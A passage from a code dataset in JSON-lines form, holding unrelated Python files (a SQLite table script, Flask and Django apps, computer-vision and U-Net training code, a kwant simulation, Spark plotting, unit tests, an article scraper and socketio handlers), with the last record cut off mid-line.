from TourInfo '\n# sql = 'drop table TourInfo'\n# sql='''insert into TourInfo (travel_agent, tour_id, tour_name, leave_date, \n# days, unfilled_places, total_places, fee) values (?, ?, ?, ?, ?, ?, ?, ?)'''\n# sql = ''' CREATE TABLE IF NOT EXISTS TourInfo (\n# travel_agent text not null,\n# tour_id text not null,\n# tour_name text NOT NULL,\n# leave_date text NOT NULL, \n# days integer NOT NULL, \n# unfilled_places integer NOT NULL,\n# total_places integer NOT NULL,\n# fee integer NOT NULL,\n# PRIMARY KEY (travel_agent, tour_id)\n# ); '''\n\n\n\nif 'insert' in sql:\n values=('Gloria', 'SELA5OZ8914C' , \\\n '【花漾韓國】∼入住首爾市區飯店+升等五花飯店∼韓服體驗、愛寶樂園、冰雪樂園、光明洞窟、拌飯秀5天', \\\n '2018/09/14', 
5, 0, 20, 14500)\n cur.execute(sql,values)\nelse:\n cur.execute(sql)\n\nconn.commit()\nprint('SQL Committed:' + sql)\nconn.close()\nprint('Database connection closed!')","sub_path":"DBSchema/ExecSQL.py","file_name":"ExecSQL.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"222956348","text":"__author__ = 'wilrona'\n\nfrom google.appengine.ext import ndb\nfrom ..travel.models_travel import TravelModel\nfrom ..vessel.models_vessel import VesselModel\n\n\nclass DepartureModel(ndb.Model):\n departure_date = ndb.DateProperty()\n schedule = ndb.TimeProperty()\n time_delay = ndb.TimeProperty()\n destination = ndb.KeyProperty(kind=TravelModel)\n vessel = ndb.KeyProperty(kind=VesselModel)\n date_update = ndb.DateProperty(auto_now=True)\n\n def make_to_dict(self):\n to_dict = {}\n to_dict['departure_id'] = self.key.id()\n to_dict['departure_date'] = str(self.departure_date)\n to_dict['departure_schedule'] = str(self.schedule)\n if self.time_delay:\n to_dict['departure_delay'] = str(self.time_delay)\n to_dict['delay'] = True\n else:\n to_dict['delay'] = False\n to_dict['departure_destination'] = self.destination.id()\n to_dict['departure_vessel'] = self.vessel.id()\n return to_dict\n\n def reserved(self):\n from ..ticket.models_ticket import TicketModel\n\n reserved_count = TicketModel.query(\n TicketModel.departure == self.key,\n TicketModel.travel_ticket == self.destination\n ).count()\n\n reserved = False\n if reserved_count >= 1:\n reserved = True\n\n return reserved\n","sub_path":"application/modules/departure/models_departure.py","file_name":"models_departure.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"40383885","text":"from flask import Flask, render_template, jsonify\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n 'Show the homepage'\n return render_template('home.html'), 200\n\n\n@app.route('/endpoint', methods=['GET'])\ndef endpoint():\n 'Any custom endpoint - useful when creating APIs'\n\n return jsonify({\"result\": \"This just works!\"}), 200\n\n\napp.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"521510319","text":"import cv2 as cv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport utils\n\ndef find_matches(des1, des2, thresh=0.8):\n a2 = (des1**2).sum(axis=1)\n b2 = (des2**2).sum(axis=1)\n ab = np.dot(des2, des1.T)\n norm = (a2[np.newaxis, :] -2*ab + b2[:, np.newaxis]).T\n best = norm.argsort(axis=1)[:, :2]\n for kp in range(des1.shape[0]):\n if norm[kp, best[kp,0]] / norm[kp, best[kp,1]] < thresh:\n yield (kp, best[kp, 0])\n\ndef detect_keypoints(I):\n sift = cv.xfeatures2d.SIFT_create()\n kp, des = sift.detectAndCompute(I, None)\n return kp, des \n\ndef pipeline(vid='dataset/trimmed/6032627733001_Trim.mp4'):\n prev = None\n i = 0\n for idx, frame in utils.video(vid):\n if prev is not None:\n if (i % 3) != 0: continue\n tup1 = detect_keypoints(frame)\n tup2 = detect_keypoints(prev)\n img2 = frame.copy()\n for kp1, kp2 in find_matches(tup1[1], tup2[1], 0.5):\n x1,y1 = tup1[0][kp1].pt\n x2,y2 = tup2[0][kp2].pt\n manhattan = abs(x1-x2) + abs(y1-y2)\n if manhattan > 5:\n cv.circle(img2, (int(x1), int(y1)), 2, (255, 0, 0), -1)\n cv.circle(img2, (int(x2), int(y2)), 2, (0, 0, 255), -1)\n yield img2\n prev = 
frame\n\nutils.writer(pipeline(), 'sift.mp4')","sub_path":"detection/classical/sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"569637071","text":"import preproc.get_data as data\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nimport glob\nimport datetime\n\nfrom metrics.f1 import f1\nfrom metrics.f1 import f1_binary\n\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nimport os\n\nfrom models import unet2 as unet\nfrom submission import model_to_submission as submission\n\n\n\ndef train_sub(model, model_name, x, y, validation_data, epochs=100, batch_size=8, verbose=2):\n tf.compat.v1.reset_default_graph()\n tf.random.set_seed(42424242)\n tf.compat.v1.set_random_seed(42424242)\n\n print('\\n\\n\\nMODEL:' + model_name)\n earlystopper = EarlyStopping(patience=13, verbose=2)\n model_path_name = 'checkpoints/ckp_{}.h5'.format(model_name)\n checkpointer = ModelCheckpoint(model_path_name, verbose=1, save_best_only=True)\n\n os.makedirs(\"tf_logs\", exist_ok = True)\n log_dir = \"tf_logs/\" + model_name + \"_\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n\n history = model.fit(x, y, validation_data=validation_data,\n batch_size=batch_size, epochs=epochs,\n callbacks=[earlystopper, checkpointer, tensorboard_callback],\n verbose=verbose)\n\n model.load_weights(model_path_name)\n submission.create_with_split(model, model_name)\n\n\n\ndef main():\n x1, y1 = data.get_training_data()\n x2, y2 = data.get_training_data2()\n\n print('x1, y1',x1.shape, y1.shape)\n x1_train, x_test, y1_train, y_test = train_test_split(x1, y1, test_size=0.3, random_state=42424242)\n\n\n print('x1_train, x2', x1_train.shape, x2.shape, x1_train.dtype, x2.dtype)\n x = np.concatenate((x1_train, x2), axis=0)\n print(y1_train.shape, y2.shape)\n y = np.concatenate((y1_train, y2), axis=0)\n\n #x, y = data.augment_data(x, y)\n\n # x, y = data.augment_data(x,y)\n\n\n # crossentropy\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_crossentropy_EXTDATA_FS_1'\n \n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\n\n # dice\n from losses import dice\n loss = dice.dice_loss\n\n model_name = 'u_net_dice'\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss=loss, metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_dice_EXTDATA_FS_1'\n \n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\n\n # u_net_focal\n from losses import focal\n loss = focal.focal_loss\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss=loss, metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_focal_EXTDATA_FS_1'\n \n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\n\n # lovasz\n from losses import lovasz\n loss = lovasz.lovasz_loss\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss=loss, metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, 
f1_binary])\n model_name = 'u_net2_lovasz_EXTDATA_FS_1'\n\n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train_for_submission.py","file_name":"train_for_submission.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"651367032","text":"import torch\nimport numpy as np\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\n\nfrom trainer import load_embeddings\nfrom lib.tokenizer import preprocessor\nfrom lib.config import MODEL_EC, DEVICE\nfrom lib.data_utils import vectorize\nfrom lib.utils import load_movies, load_music\n\napp = Flask(__name__)\napp._static_folder = './static'\n\nlabels = ['Anger', 'Anticipation', 'Disgust', 'Fear', 'Joy', 'Love', 'Optimism', 'Pessimism', 'Sadness', 'Surprise', 'Trust', 'Neutral']\nrecommend_id = [1, 4, 2, 3, 4, 4, 4, 3, 5, 6, 4, 4]\nmodel_path = '/home/houyu/learning/FinalProject/out/model/EmotionClassification_0.5900_2019-05-06_00:51.model'\nmovie_path = '/home/houyu/learning/FinalProject/database/MovieData.csv'\nmusic_path = '/home/houyu/learning/FinalProject/database/MusicData.csv'\nmodel_conf = MODEL_EC\nmax_length = 85 # 85 train 65 dev 58 test\n\n# 1 1 0 0 0 0 1 0 0 0 1\n# test_sentence = '@Adnan__786__ @AsYouNotWish Dont worry Indian army is on its ways to dispatch all Terrorists to Hell'\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/response', methods=['post'])\ndef response():\n print(\"RESPONSE ...\")\n\n # Loading model\n model = torch.load(model_path)\n model.eval()\n\n # Pre-processing inputs\n input_text = request.form.get('message')\n print(input_text)\n input_text = input_text.strip()\n if input_text == '':\n print(\"Oops! 
You input nothing!\")\n emotions = ['NONE']\n movies = [['NONE']]\n songs = [['NONE']]\n return render_template('response.html', emotions=emotions, movies=movies, songs=songs)\n else:\n pro_sent = preprocessor(input_text)\n\n # Embedding and vectorize\n word2idx, _, embeddings = load_embeddings(model_conf)\n sample = vectorize(pro_sent, word2idx, max_length)\n\n # Processing to get model inputs\n samples = []\n lengths = []\n samples.append(sample)\n lengths.append(len(pro_sent))\n\n # tensor([17, 4, 37, 42, 21, 16, 13, 44, 29, 10, 15, 22, 21, 23, 18, 23, 25, 10,\n # 23, 9, 22, 18, 14, 15, 6, 33, 14, 30, 13, 22, 26, 17],\n # device='cuda:0')\n # torch.ones([2, 4], dtype=torch.float64, device=cuda0)\n samples = np.asarray(samples)\n lengths = np.asarray(lengths)\n\n samples = torch.tensor(samples)\n lengths = torch.tensor(lengths)\n\n samples = samples.to(DEVICE)\n lengths = lengths.to(DEVICE)\n\n\n # Running model\n outputs, attentions = model(samples, lengths)\n\n # print(attentions)\n\n # tensor([ 2.1146, -1.7304, 2.0117, -1.3296, -3.1048, -5.9759, -2.7536, -2.7494, print(outputs)\n # -1.8445, -4.1412, -4.7449], device='cuda:0', grad_fn=)\n # tensor([0.0521, 0.0631, 0.0632, 0.0632, 0.0632, 0.0632, 0.0631, 0.0632, 0.0632, print(attentions)\n # 0.0632, 0.0631, 0.0632, 0.0632, 0.0632, 0.0632, 0.0632],\n # device='cuda:0', grad_fn=)\n # gold: 1 1 0 0 0 0 1 0 0 0 1\n # [ 2.11464429 -1.7303592 2.01172185 -1.32956982 -3.10483193 -5.97593689 print(posts)\n # -2.75357819 -2.74935317 -1.84453487 -4.14115143 -4.74489594]\n posts = outputs.data.cpu().numpy()\n predicted = np.clip(np.sign(posts), a_min=0, a_max=None) # 1 1 0 0 0 0 1 0 0 0 1\n predicted = predicted.astype(np.int32)\n\n emotions = []\n ids = set()\n sum_item = 0\n for idx, item in enumerate(predicted):\n if item == 1:\n emotions.append(labels[idx])\n ids.add(recommend_id[idx])\n sum_item += item\n if sum_item == 0:\n emotions.append(labels[11]) # neutral\n ids.add(recommend_id[11])\n\n if len(emotions) > 6:\n print(\"Hey, there are more than 6 predicted emotions. 
Below are original emotions and emotions for displaying.\")\n print(emotions)\n emotions = emotions[:6]\n print(emotions)\n else:\n print(emotions)\n\n print(ids)\n\n # movies and music matching\n all_movies = load_movies(movie_path)\n all_music = load_music(music_path)\n movies = []\n songs = []\n for i in ids:\n for m in all_movies[i]:\n movies.append(m)\n for s in all_music[i]:\n songs.append(s)\n\n print(songs)\n print(movies)\n\n if len(movies) > 3:\n random_int = set()\n while len(random_int) < 3:\n index = np.random.randint(low=0, high=len(movies))\n random_int.add(index)\n new_movies = []\n for i in random_int:\n new_movies.append(movies[i])\n movies = new_movies\n print(movies)\n if len(songs) > 6:\n random_int = set()\n while len(random_int) < 6:\n index = np.random.randint(low=0, high=len(songs))\n random_int.add(index)\n # indexs = np.random.randint(low=0, high=len(songs), size=6)\n new_songs = []\n for i in random_int:\n new_songs.append(songs[i])\n songs = new_songs\n print(songs)\n\n\n return render_template('response.html', emotions=emotions, movies=movies, songs=songs)\n\n\ndef main():\n print(\"Starting...\")\n\n app.run(host='0.0.0.0', debug=False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"646730442","text":"from newspaper import Article\nimport csv\nimport tldextract\n\n# Metadata:\n\n# twitter account, stock, url, source, title, authors, \n# publish_date, text, and keywords.\n\n# Diverse News Sources for Testing:\n\n# CNN, Yahoo Finance, Wall Street Journal, Bloomberg, CNBC, Reuters, \n# Marketwatch, Financial times, Kiplinger, Motley Fool, Invester Times Daily, \n\n# function that takes in url parameter and saves metadata to csv file\ndef getArticleMetadata(url):\n article_info_dict = {}\n article = Article(url)\n article.download()\n article.parse()\n # extracts domain name from the news source URL\n extracted_url = tldextract.extract(url)\n # saves data to a dictionary\n article_info_dict['url'] = url\n article_info_dict['source'] = extracted_url.domain\n article_info_dict['title'] = article.title\n article_info_dict['authors'] = article.authors\n article_info_dict['publish_date'] = article.publish_date\n print()\n print(article_info_dict)\n \n # saves dictionary to csv file\n with open('metadata.csv', 'a', newline='') as csv_file:\n fieldnames = ['twitter_account', 'stock', 'url', 'source', 'title', 'authors', 'publish_date', 'text', 'keywords']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writerow(article_info_dict)\n\n# Testing One URL\nurl = 'https://www.cnn.com/2020/03/16/tech/amazon-shipping-coronavirus/index.html'\ngetArticleMetadata(url)\n\n# Testing Multiple URLs\n# url_list = ['https://www.cnn.com/2020/03/16/tech/amazon-shipping-coronavirus/index.html',\n# 'https://finance.yahoo.com/news/apocalyptic-scenario-unlikely-amazon-other-tech-stocks-tech-analyst-says-194143166.html',\n# 'https://www.wsj.com/articles/coronavirus-sparks-hiring-spree-for-nearly-500-000-jobs-at-biggest-retailers-11584984596',\n# 'https://www.bloomberg.com/opinion/articles/2020-04-01/apple-deal-with-amazon-prime-video-is-game-changer',\n# 'https://www.cnbc.com/2020/03/29/amazon-workers-in-staten-island-plan-strike-over-coronavirus-safety.html',\n# 
'https://www.reuters.com/article/us-health-coronavirus-amazon-com-masks-e/exclusive-amazon-to-deploy-masks-and-temperature-checks-for-workers-by-next-week-idUSKBN21K1Y6',\n# 'https://www.marketwatch.com/story/as-coronavirus-hits-hard-amazon-starts-licensing-cashier-free-technology-to-retailers-2020-03-31',\n# 'https://www.ft.com/content/220bf850-726c-11ea-ad98-044200cb277f',\n# 'https://www.kiplinger.com/slideshow/investing/T018-S001-the-9-best-dow-jones-dividend-growth-stocks/index.html',\n# 'https://www.fool.com/investing/2020/04/02/india-coronavirus-lockdown-mean-amazon-walmart.aspx',\n# 'https://www.investors.com/research/how-to-find-the-best-stocks-to-buy/amazon-stock-aws-cloud-services-drive-coronavirus-stock-market/'\n# ]\n\n# for url in url_list:\n# getArticleMetadata(url)\n\n","sub_path":"code/articlescraper.py","file_name":"articlescraper.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"448752734","text":"# encoding: utf-8\n\"\"\"\nUtilities for testing.\n\"\"\"\nfrom __future__ import unicode_literals\nfrom contextlib import contextmanager\n\nfrom tornado.web import HTTPError\n\n\n@contextmanager\ndef assertRaisesHTTPError(testcase, status, msg=None):\n msg = msg or \"Should have raised HTTPError(%i)\" % status\n try:\n yield\n except HTTPError as e:\n testcase.assertEqual(e.status_code, status)\n else:\n testcase.fail(msg)\n","sub_path":"hybridcontents/tests/testing_utils.py","file_name":"testing_utils.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"80284280","text":"\"\"\"Provide socketio event handlers.\"\"\"\nfrom imjoy.utils import get_psutil\n\nfrom .decorator import socketio_handler as sio_on\n\nNAME_SPACE = \"/\"\n\n\ndef register_services(engine, register_event_handler):\n \"\"\"Register services running by the engine.\"\"\"\n # basic engine service\n register_event_handler(engine, connect)\n register_event_handler(engine, disconnect)\n register_event_handler(engine, reset_engine)\n register_event_handler(engine, on_get_engine_status)\n\n\n@sio_on(\"connect\")\ndef connect(engine, sid, _):\n \"\"\"Connect client.\"\"\"\n logger = engine.logger\n logger.info(\"Connect %s\", sid)\n\n\n@sio_on(\"reset_engine\")\nasync def reset_engine(engine, sid, kwargs):\n \"\"\"Reset engine.\"\"\"\n logger = engine.logger\n registered_sessions = engine.store.registered_sessions\n if sid not in registered_sessions:\n logger.debug(\"Client %s is not registered\", sid)\n return {\"success\": False, \"error\": \"client has not been registered\"}\n\n # services and runners can register reset_engine_* handlers that will be called here\n for event, handler in engine.conn.sio.handlers[NAME_SPACE].items():\n if not event.startswith(\"reset_engine_\"):\n continue\n await handler(sid, kwargs)\n\n engine.conn.reset_store(reset_clients=False)\n\n return {\"success\": True}\n\n\n@sio_on(\"get_engine_status\")\nasync def on_get_engine_status(engine, sid, _):\n \"\"\"Return engine status.\"\"\"\n logger = engine.logger\n plugins = engine.store.plugins\n registered_sessions = engine.store.registered_sessions\n if sid not in registered_sessions:\n logger.debug(\"Client %s is not registered\", sid)\n return {\"success\": False, \"error\": \"client has not been registered.\"}\n psutil = get_psutil()\n if psutil is None:\n return {\"success\": False, \"error\": \"psutil is not available.\"}\n current_process 
= psutil.Process()\n children = current_process.children(recursive=True)\n pid_dict = {}\n for plugin in plugins.values():\n if plugin[\"process_id\"] is not None:\n pid_dict[plugin[\"process_id\"]] = plugin\n\n procs = []\n for proc in children:\n if proc.is_running() and proc.status() != psutil.STATUS_ZOMBIE:\n if proc.pid in pid_dict:\n procs.append({\"name\": pid_dict[proc.pid][\"name\"], \"pid\": proc.pid})\n else:\n procs.append({\"name\": proc.name(), \"pid\": proc.pid})\n\n return {\n \"success\": True,\n \"plugin_num\": len(plugins),\n \"plugin_processes\": procs,\n \"engine_process\": current_process.pid,\n }\n\n\n@sio_on(\"disconnect\")\nasync def disconnect(engine, sid):\n \"\"\"Disconnect client.\"\"\"\n logger = engine.logger\n # services and runners can register disconnect_* handlers that will be called here\n for event, handler in engine.conn.sio.handlers[NAME_SPACE].items():\n if not event.startswith(\"disconnect_\"):\n continue\n await handler(sid)\n logger.info(\"Client(%s) disconnected\", sid)\n","sub_path":"imjoy/connection/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"423615500","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 1 13:26:48 2019\n\n@author: ykang\n\"\"\"\n\nimport numpy as np\nimport kwant\nfrom kwant.digest import uniform\n#from matplotlib import pyplot\n\nlat = kwant.lattice.chain()\ndef make_system(length,dis,salt):\n def onsite(site):\n return dis*(uniform(repr(site),salt)-.5)+4 +0.2j\n syst = kwant.Builder()\n syst[(lat(x) for x in range(length))] = onsite\n syst[lat.neighbors()] = -1\n\n lead = kwant.Builder(kwant.TranslationalSymmetry([-1]))\n lead[(lat(0))] = 4\n lead[lat.neighbors()] = -1\n\n syst.attach_lead(lead)\n syst.attach_lead(lead.reversed())\n return syst\n\n\ndef mount_vlead(sys, vlead_interface, norb):\n \"\"\"Mounts virtual lead to interfaces provided.\n\n :sys: kwant.builder.Builder\n An unfinalized system to mount leads\n :vlead_interface: sequence of kwant.builder.Site\n Interface of lead\n :norb: integer\n Number of orbitals in system hamiltonian.\n \"\"\"\n dim = len(vlead_interface)*norb\n zero_array = np.zeros((dim, dim), dtype=float)\n def selfenergy_func(energy, args=()):\n return zero_array\n\n vlead = kwant.builder.SelfEnergyLead(selfenergy_func, vlead_interface)\n sys.leads.append(vlead)\n\n########### for one configuration\n#di=11\n#def make_system0(width, length):\n# def disk(pos):\n# x,y=pos\n# return width-di= 0)\n if df.count() > 1000:\n permilles = self.df.approxQuantile(\"memory_requested\", [float(i) / 1000 for i in range(0, 1001)], 0.001)\n memory_consumptions = sorted(pd.DataFrame({\"memory_requested\": permilles})[\"memory_requested\"].tolist())\n else:\n memory_consumptions = sorted(df.toPandas()[\"memory_requested\"].tolist())\n\n # If no values are found, we cannot generate a CDF.\n if not memory_consumptions:\n plt.text(0.5, 0.5, 'Not available;\\nTrace does not contain this information.', horizontalalignment='center',\n verticalalignment='center', transform=plt.axes().transAxes, fontsize=16)\n plt.grid(False)\n else:\n ecdf = sm.distributions.ECDF(memory_consumptions)\n\n # Change min to 0 to make it start at 0\n x = np.linspace(min(memory_consumptions), max(memory_consumptions))\n y = ecdf(x)\n plt.step(x, y)\n\n plt.xlabel('Memory (MB)', fontsize=18)\n plt.ylabel('P', fontsize=18)\n\n plt.xlim(0)\n plt.margins(0.05)\n plt.tight_layout()\n\n 
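# A minimal NumPy-only sketch of the ECDF step used in the
# task_memory_consumption_cdf.py record above, which relies on
# statsmodels (sm.distributions.ECDF); shown here for readers without
# statsmodels. The sample values are illustrative, not from any trace.
import numpy as np

def ecdf(samples):
    # Sort the observations; the ECDF at x is the fraction of samples <= x.
    xs = np.sort(np.asarray(samples, dtype=float))
    ys = np.arange(1, len(xs) + 1) / len(xs)
    return xs, ys

xs, ys = ecdf([512.0, 128.0, 256.0, 1024.0])
assert ys[-1] == 1.0  # an ECDF always reaches 1 at the largest sample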
plt.savefig(os.path.join(self.folder, filename), dpi=200, format='png')\n if show:\n plt.show()\n\n return filename\n","sub_path":"statistic_scripts/task_memory_consumption_cdf.py","file_name":"task_memory_consumption_cdf.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"610092202","text":"import driver\n\ndef letter(row, col):\n\tif (row <2) or (row>6):\n\t\treturn 'T'\n\telse:\n\t\tif(col<4)or(col>12):\n\t\t\treturn 'T'\n\t\tif(row == 2) or (row==3):\n\t\t\tif (col>9):\n\t\t\t\treturn 'T'\n\t\tif(row==4) or (row==5):\n\t\t\tif(col>6)and(col<10):\n\t\t\t\treturn 'X'\n\t\t\tif(col>9)and(col<13):\n\t\t\t\treturn 'B'\n\t\tif(row==6):\n\t\t\tif col<7:\n\t\t\t\treturn 'T'\n\t\t\tif(col>6)and(col<13):\n\t\t\t\treturn 'B'\n\t\treturn 'Z'\n\n\n\nif __name__ == '__main__':\n\tdriver.comparePatterns(letter)","sub_path":"patterns/pattern07.py","file_name":"pattern07.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"242725746","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\n\nfrom .forms import ContactForm\n\n\ndef about_page(request):\n context ={\n \"title\" : \"About - 013\",\n \"content\" :\"Welcome to the About Page\" \n } \n return render(request,\"home_page.html\", context)\n\n#015\ndef contact_page(request):\n form = ContactForm(request.POST or None)\n \n context ={\n \"title\" : \"Contact\",\n \"content\" :\"Welcome to the Contact Page\", \n \"form\" : form,\n }\n\n if form.is_valid():\n print(f'ecommerce:views::contact_page - form.cleaned_data, {form.cleaned_data}')\n if request.is_ajax():\n return JsonResponse({\"message\": \"Thank You\"})\n \n if form.errors:\n errors = form.errors.as_json()\n if request.is_ajax():\n return HttpResponse(errors, status=400, content_type='application/json')\n return render(request,\"contact/view.html\", context)\n\n\ndef home_page(request):\n #print(request.session['first_name']) # throws error if key does not exist\n # if not request.user.is_authenticated:\n # return login_page(request)\n\n #print(f'ecommerce:views::home_page - request.session.get(\"first_name\", \"unknown\") : {request.session.get(\"first_name\", \"unknown\")}')\n context = {\n \"title\" : \"Hello World - home_page view\",\n \"content\" :\"Content - home_page content\",\n }\n\n if request.user.is_authenticated:\n context[\"premium_content\"] = \"Here is your Premium Content\"\n\n return render(request,\"home_page.html\", context)","sub_path":"src/ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"439759148","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.4-x86_64/egg/trachet/ss2.py\n# Compiled at: 2014-07-01 10:29:06\nfrom __future__ import print_function\nimport seqdb, template\n_DB = seqdb.get()\n\ndef get_mnemonic(direction, f):\n \"\"\"\n >>> get_mnemonic('=', 'O')\n ''\n \"\"\"\n global _DB\n key = '%s ESC N %s' % (direction, f)\n if key in _DB:\n mnemonic = _DB[key]\n else:\n mnemonic = ''\n return mnemonic\n\n\ndef format_seq(final, is_input, tracer, controller):\n f = chr(final)\n if is_input:\n direction = '<'\n else:\n direction = '>'\n mnemonic = 
get_mnemonic(direction, f)\n if mnemonic[0] == '!':\n return eval(mnemonic[1:])\n context = []\n if f:\n context.append(f)\n result = template.getss2() % ((' ').join(context), mnemonic)\n return result\n\n\ndef _test():\n \"\"\"\n >>> _test()\n test\n \n \"\"\"\n global _DB\n _DB = {'> ESC N O': 'test'}\n print(get_mnemonic('>', 'O'))\n print(get_mnemonic('>', 'A'))\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()","sub_path":"pycfiles/trachet-1.0.9-py2.6/ss2.py","file_name":"ss2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"177932480","text":"#使用ddt来进行数据驱动\n#根据用例的数量来自动生成实例方法,批量执行用例\nimport unittest\nfrom libs.ddt import ddt, data\nfrom scripts.handle_excel import HandleExcel\nfrom scripts.handle_config import do_config\nfrom scripts.handle_log import do_log\n\ndo_excel = HandleExcel(do_config.get_config(\"file path\", \"cases_path\"),do_config.get_config(\"file path\", \"sheet_name\"))\ncases = do_excel.get_cases()\n@ddt\nclass Test01(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # wenjian = do_config.get_config(\"file path\", \"log_path\")\n # cls.rizhi = open(wenjian,\"a\",encoding=\"utf8\")\n # cls.rizhi.write(\"\\n{:=^40s}\\n\".format(\"测试用例开始执行\"))\n do_log.info(\"\\n{:=^40s}\".format(\"测试用例开始执行\"))\n\n @classmethod\n def tearDownClass(cls):\n # cls.rizhi.write(\"{:=^40s}\\n\".format(\"测试用例执行结束\"))\n # cls.rizhi.close()\n do_log.info(\"\\n{:=^40s}\".format(\"测试用例开始执行\"))\n\n @data(*cases) #拆包 这里相当于for循环 每拆一次是一个元组会赋值给one_case\n def test_ride(self,one_case):\n actual_results = Jisuan(one_case['l_data'], one_case['r_data']).ride()\n msg = one_case['title']\n expected_results = one_case['expected']\n success_msg = do_config.get_config(\"msg\", \"success_result\")\n fail_msg = do_config.get_config(\"msg\", \"Fail_result\")\n try:\n self.assertEqual(expected_results,actual_results, msg=msg)\n # self.rizhi.write(\"test_ride:{} ,测试结果为 {}\\n\".format(msg,success_msg))\n do_log.info(\"test_ride:{} ,测试结果为 {}\\n\".format(msg, success_msg))\n do_excel.write_result(one_case['case_id']+1,actual_results,success_msg)\n except AssertionError as e:\n # self.rizhi.write(\"test_ride:{} ,测试结果为 {}.具体异常为{}\\n\".format(msg,fail_msg,e))\n do_log.error(\"test_ride:{} ,测试结果为 {}.具体异常为{}\\n\".format(msg,fail_msg,e))\n do_excel.write_result(one_case['case_id'] + 1, actual_results, fail_msg)\n raise e #因为上面捕获了异常,所以这里用raise来返回异常\n\nif __name__ == '__main__':\n unittest.main()\n #执行了多少条用例,用例条数与data装饰器的(位置)参数个数一致\n #ddt和data是黄金搭档,要一起使用才行","sub_path":"cases/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"347972625","text":"import numpy as np\nimport os.path\nimport scipy.misc\nimport shutil\nimport tensorflow as tf\nfrom tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file\nfrom moviepy.editor import VideoFileClip\nimport helper\n\n\nRUN_VIDEO = True\n\ndef pipeline(img):\n img = scipy.misc.imresize(img, image_shape)\n\n img_norm = apply_gaussian(img)\n\n im_softmax = sess.run([tf.nn.softmax(logits)], {keep_prob: 1.0, image_pl: [img_norm]})\n im_softmax = im_softmax[0][:, 1].reshape(image_shape[0], image_shape[1])\n segmentation = (im_softmax > 0.5).reshape(image_shape[0], image_shape[1], 1)\n mask = np.dot(segmentation, np.array([[0, 255, 0, 127]]))\n mask = scipy.misc.toimage(mask, mode=\"RGBA\")\n street_im = 
